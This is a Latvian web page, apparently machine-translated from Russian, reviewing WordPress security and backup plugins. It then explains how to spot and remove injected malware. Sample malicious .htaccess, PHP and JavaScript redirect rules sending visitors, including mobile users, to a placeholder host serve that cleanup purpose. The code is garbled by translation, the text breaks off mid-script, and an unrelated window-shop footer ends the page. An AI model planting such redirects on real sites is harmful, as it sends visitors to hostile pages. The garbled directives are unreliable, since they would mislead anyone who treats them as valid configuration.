    Visaptverošs spraudnis, kas uzrauga vietnes failu izmaiņas un veic pretvīrusu funkcijas.

    Ko dara spraudnis:

    • pārbauda vietnes kodā aizdomīgas izmaiņas un nosūta paziņojumus;
    • skenē ļaunprātīgu programmatūru un liedz piekļuvi;
    • izveido IP melno sarakstu un aizliedz tiem mijiedarboties ar vietni;
    • reģistrē to apmeklētāju IP, kuri neveiksmīgi mēģina iekļūt vietnē, un bloķē tos uz ierobežotu laiku;
    • automātiski skenē vietni pret vīrusiem un nosūta ziņojumus pa e-pastu.

    Premium versijā tas izveido ugunsmūri papildu aizsardzībai pret uzbrukumiem. Lasiet vairāk par drošības līdzekļiem spraudņa lapā.


    Ziņojumi par aizdomīgām darbībām

    Spraudnis nav tulkots krievu valodā, bet ir pieejams bezmaksas lejupielādei.

    Atslēgas divu faktoru autentifikācija

    Spraudnis administratora paneļa aizsardzībai no iebrucējiem, padarot piekļuvi administratora panelim ērtāku un ātrāku.

    Ko dara spraudnis:

    • aizsargā vietni no uzlaušanas;
    • saglabā ierīcē drošu paroli, tā nav jāievada piesakoties;
    • ļauj piekļūt administratora zonai, izmantojot pirkstu nospiedumu;
    • ļauj vairāku vietņu administratoriem ar vienu klikšķi pārslēgties starp paneļiem.
    Darba piemērs

    Spraudnis nav tulkots un ir pieejams bez maksas.

    WWPass divu faktoru autentifikācija

    Spraudnis aizsardzībai pret iebrucēju iekļūšanu administratora panelī.

    Ko dara spraudnis:

    • pievieno QR kodu, ko skenēt, mēģinot pieteikties administratora apgabalā;
    • ļauj bez maksas izmantot PassHub paroļu pārvaldnieku.
    Spraudņa darbības piemērs

    Ir pieejama bezmaksas versija angļu valodā.

    Ja uzbrucējiem izdevās kaut ko izdarīt ar vietni un ir jāatjauno tā iepriekšējā stāvoklī, dublējumkopijas palīdzēs. Parasti mitinātāji periodiski veido dublējumus, taču katram gadījumam labāk ir izveidot dublējumus pašiem. Daži spraudņi no atlases var izveidot kopijas, un ir arī atsevišķi risinājumi dublēšanai.

    Spraudņi vietņu dublēšanai pakalpojumā WordPress BackWPup — WordPress dublēšanas spraudnis

    Spraudnis dublējumu izveidei un iepriekšējo vietnes versiju atjaunošanai.

    Ko dara spraudnis:

    • veido visas vietnes ar saturu dublējumkopijas;
    • eksportē WordPress XML;
    • apkopo instalētos spraudņus failā;
    • nosūta kopijas uz ārējo mākoņkrātuvi, e-pastu vai pārsūta, izmantojot FTP.

    Maksas PRO versija šifrē arhīvus ar dublējumkopijām un atjauno dublējumkopijas ar pāris klikšķiem.


    Rezerves arhīvu pārvaldība

    Pieejams bez maksas, ir apmaksāta PRO versija, bet nav tulkota krievu valodā.

    UpdraftPlus WordPress dublēšanas spraudnis

    Ko dara spraudnis:

    • kopē un atjauno datus ar vienu klikšķi;
    • veic automātiskas dublējumkopijas pēc grafika;
    • pārbauda un atjauno datu bāzes;
    • nosūta dublējumkopijas uz mākoni, Google disku un citām jūsu izvēlētām krātuves vietām.

    Uzlabotā versija sniedz plašāku iespēju izvēlēties kopiju uzglabāšanas vietas un citas papildu funkcijas.


    Notiek rezerves krātuves iestatīšana

    Nav tulkots krievu valodā, pieejams bez maksas.

    VaultPress

    Vēl viens spraudnis dublēšanai un uzticamai kopiju glabāšanai.

    Ko dara spraudnis:

    • katru dienu automātiski kopē visus vietnes failus ar saturu un komentāriem;
    • atjauno vietni no kopijas, noklikšķinot;
    • aizsargā vietni no uzbrukumiem un ļaunprātīgas programmatūras.

    Darbojas bez maksas vienā vietnē, glabā datus 30 dienas. Par papildu samaksu varat pārraudzīt vairākas vietnes no viena paneļa un saglabāt datus ilgāk.


    Darba panelis

    Spraudnis nav tulkots krievu valodā, bet ir pieejams instalēšanai bez maksas.

    Vietnēm ir nepieciešama aizsardzība pret iebrucējiem, lai tās nevarētu piekļūt sensitīvai informācijai, izmantot jūsu resursus, lai uzbruktu citām vietnēm, nosūtītu vēstules klientiem un traucētu resursa stabilu darbību. Spraudņi rada šķēršļus krāpniekiem, aizsargā lietotāju datus un vietnes kodu, un dublēšanas sistēmas atgriezīs vietni tās iepriekšējā stāvoklī, ja uzbrucējiem izdevās nodarīt kaitējumu.

    Pirms izdomājat, kā tīrīt WordPress vietni, jums ir jāsaprot, ar ko tieši mēs nodarbosimies. Plašā nozīmē jēdziens “vīruss” nozīmē ļaunprātīgu programmatūru, kas var nodarīt zināmu kaitējumu tīmekļa resursa īpašniekam. Tādējādi šajā kategorijā var iekļaut gandrīz jebkuru kodu, ko uzbrucēji ir ieguluši programmas skriptos. Tās varētu būt slēptās saites, kas izraisa pesimizāciju meklēšanas rezultātos, aizmugures durvis, kas nodrošina hakeram administratora piekļuvi, vai sarežģītas struktūras, kas vietni pārvērš par zombiju tīkla mezglu un pat Bitcoin kalnraču. Runāsim par to, kā atpazīt un likvidēt dažāda kalibra vīrusus, kā arī aizsargāties pret tiem.

    Daudzi iepriekšējos rakstos minētie padomi var aizsargāt jūsu vietni no infekcijas. Piemēram, pirātiskās veidnēs un spraudņos var atrast “infekciju”, šādu komponentu pilnīga noraidīšana ir svarīgs solis no drošības viedokļa. Tomēr ir vairākas specifiskākas nianses.

    1. Instalējiet uzticamu antivīrusu

    Ļaunprātīga programma var tikt ieviesta ne tikai no ārpuses, infekcijas avots ļoti labi varētu būt dators, no kura tiek administrēts projekts. Mūsdienu Trojas zirgi var ne tikai nozagt FTP paroli, bet arī paši lejupielādēt izpildāmo kodu vai modificēt CMS failus, kas nozīmē, ka jūsu tīmekļa resursa drošība ir tieši atkarīga no jūsu darba iekārtas drošības.

    IT tirgus piedāvā daudz antivīrusu. Tomēr saprātīgākā izvēle ir lielo uzņēmumu produkti:
    ● Starp vietējiem produktiem vadošās pozīcijas ieņem Kaspersky Lab un Dr. Web.
    ● Starp ārvalstu komerciālajiem risinājumiem var izcelt Symantek Corporation Norton līniju un populāro ESET NOD;
    ● Ja mēs runājam par bezmaksas iespējām, tad Avast un Comodo šeit ir neapstrīdami līderi.

    2. Skenējiet vietni, izmantojot tiešsaistes pakalpojumus

    Ja tiek atklātas aizdomīgas darbības (dzinēja kļūdas, bremzes, uznirstošie logi un trešo pušu baneri), visvienkāršākā lieta, ko varat iedomāties, ir palaist resursu, izmantojot tiešsaistes skeneri, kas var noteikt inficēšanās faktu. Šeit neapstrīdams līderis ir VirusTotal, kas atrodas vietnē virustotal.com. Lai to izmantotu, vienkārši dodieties uz cilni “URL adrese”, ievadiet jūs interesējošo saiti un noklikšķiniet uz pogas “Pārbaudīt!”.

    Pēc kāda laika sistēma izdos ziņojumu ar šādu saturu:

    Jāprecizē: VirusTotal nav neatkarīgs projekts, bet gan sava veida pretvīrusu skeneru agregators. Šajā sakarā kļūst iespējams pārbaudīt WordPress vīrusus 67 sistēmās vienlaikus. Neapšaubāma priekšrocība ir detalizēts pārskats, kas sniedz datus par visiem atbalstītajiem pakalpojumiem. Galu galā antivīrusiem ļoti patīk radīt viltus trauksmes, tāpēc pat tad, ja noteikšanas ātrums atšķiras no ideālā (piemēram, 3/64), tas nenozīmē, ka resurss ir inficēts. Koncentrējieties galvenokārt uz lieliem spēlētājiem (Kaspersky, McAfee, Symantec NOD32 un citi mazie uzņēmumi bieži identificē noteiktas koda sadaļas kā bīstamas - neuztveriet to nopietni);

    3. Izmantojiet Yandex.Webmaster

    Droši vien pamanījāt, ka uz dažām saitēm meklēšanas rezultātos ir brīdinājuma ziņojums: "Vietne var apdraudēt jūsu datoru vai mobilo ierīci." Fakts ir tāds, ka meklētājprogrammai ir savi algoritmi ļaunprātīga koda noteikšanai, informējot lietotājus par iespējamo risku. Lai būtu informēts par notiekošo un pirmais saņemtu paziņojumus, vienkārši reģistrējieties Webmaster pakalpojumā. Visu nepieciešamo informāciju varat skatīt cilnē “Drošība”:

    Ja tiek atklāts apdraudējums, šeit tiks parādīta informācija par inficētajām lapām. Diemžēl selektīva WordPress skenēšana pret vīrusiem nav iespējama - Yandex to skenē neatkarīgi, turklāt izlasē nav iekļauti visi lejupielādētie tīmekļa dokumenti, bet tikai daļa no tiem, kas noteikti nejauši.

    4. Pārbaudiet Google pārskatus

    Pasaulē populārākā meklētājprogramma piedāvā vēl vienkāršāku pārraudzības veidu – vienkārši sekojiet saitei google.com/transparencyreport/safebrowsing/diagnostic/?hl=ru un attiecīgajā laukā ievadiet interesējošās vietnes adresi. Jūs saņemsiet visaptverošus datus par resursu un redzēsit, vai uzņēmumam Google ir kādas sūdzības saistībā ar ļaunprātīgu skriptu atklāšanu:

    Kā attīrīt WordPress vietni no vīrusu saitēm?

    Pāriesim no vispārīgiem ieteikumiem pie konkrētiem. Sāksim ar izplatītākajiem kaitīgā koda variantiem — svešu URL ieviešanu un novirzīšanu uz mērķa tīmekļa resursu. Diemžēl melnā cepure SEO joprojām ir populārs, kas nozīmē, ka hakeri nesēž dīkā, par laimi šis uzdevums ir viens no vienkāršākajiem. Sakārtosim to secībā.

    1. Novirziet uz trešās puses resursiem

    Iedomājieties situāciju: jūs apmeklējat savu vietni, bet uzreiz tiekat pārcelts uz citu “atpūtas” direktoriju vai galveno lapu, kas piedāvā pelnīt naudu Forex. Tas gandrīz noteikti nozīmē, ka tīmekļa resurss ir uzlauzts un failā .htaccess ir parādījušās vairākas jaunas rindas. Apstrāde ir vienkārša: atveriet failu, atrodiet direktīvas, kas satur adresi, uz kuru tiek veikta novirzīšana, un pēc tam izdzēsiet tās. Tātad nosacījuma malwaresite.com nepieciešamās konstrukcijas varētu būt šādas:

    < IfModule mod_alias. c>Novirzīt 301 https://site/ http://malwaresite.com/

    RewriteEngine vietnē RewriteBase/RewriteCond% (HTTP_HOST)! ^tekseo\. su [NC] RewriteRule ^(.* ) http://malwaresite.com/$1

    RewriteEngine vietnē RewriteBase / RewriteCond %(HTTP_HOST) !^tekseo\.su RewriteRule ^(.*) http://malwaresite.com/$1

    Sarežģītāka iespēja ir pastāvīga novirzīšana, kas rakstīta PHP. Ja pārbaudījāt, bet neko aizdomīgu neatradāt, visticamāk, problēma ir failā index.php. Pārvirzīšana šeit tiek veikta, nosūtot apmeklētājam nepieciešamās galvenes:

    include("redirect.php"); Izeja();

    Atcerieties - šādi fragmenti nav atrodami sākotnējā index.php, tāpēc varat tos visus droši izdzēst. Atrodiet un izdzēsiet arī iekļauto failu (mūsu piemērā tas būs redirect.php, kas atrodas saknes mapē).

    Viltīgāks gājiens ir mobilo sīkrīku novirzīšana. Piekļūstot savam resursam no personālā datora, jūs nekad neatklāsiet inficēšanās faktu, bet viedtālruņu un planšetdatoru lietotāji būs nepatīkami pārsteigti, nonākot citā lapā. Šo novirzīšanu var īstenot:

    1. .htaccess
    Vienkāršākā metode, kuru var viegli aprēķināt. Ierīci identificē piegādātais lietotāja aģents. Tas varētu izskatīties šādi:

    < IfModule mod_rewrite. c>RewriteEngine vietnē RewriteBase / RewriteCond % ( HTTP_USER_AGENT) ^.* (ipod| iphone| android).* [ NC] RewriteRule ^(.* ) $ http: //malwaresite.com/

    RewriteEngine vietnē RewriteBase/RewriteCond %(HTTP_USER_AGENT) ^.*(ipod|iphone|android).* RewriteRule ^(.*)$ http://malwaresite.com/

    2.PHP
    Novirzīšana PHP tiek īstenota līdzīgi. Tālāk norādītā konstrukcija ir atrodama indeksa failā. Atkal neaizmirstiet par visuresošajiem, tostarp:

    3. JavaScript
    Šeit tiek pārbaudīta ekrāna izšķirtspēja, ja platums ir 480 pikseļi vai mazāks, apmeklētājs tiek novirzīts uz ļaunprātīgu vietni. Ja jūsu projektā tiek izmantota līdzīga metode, noteikti pārbaudiet šajā blokā adreses izmaiņas.

    < script type= "text/javascript" >if (ekrāns. platums
    2024 okna-blitz.ru
    Logi un balkoni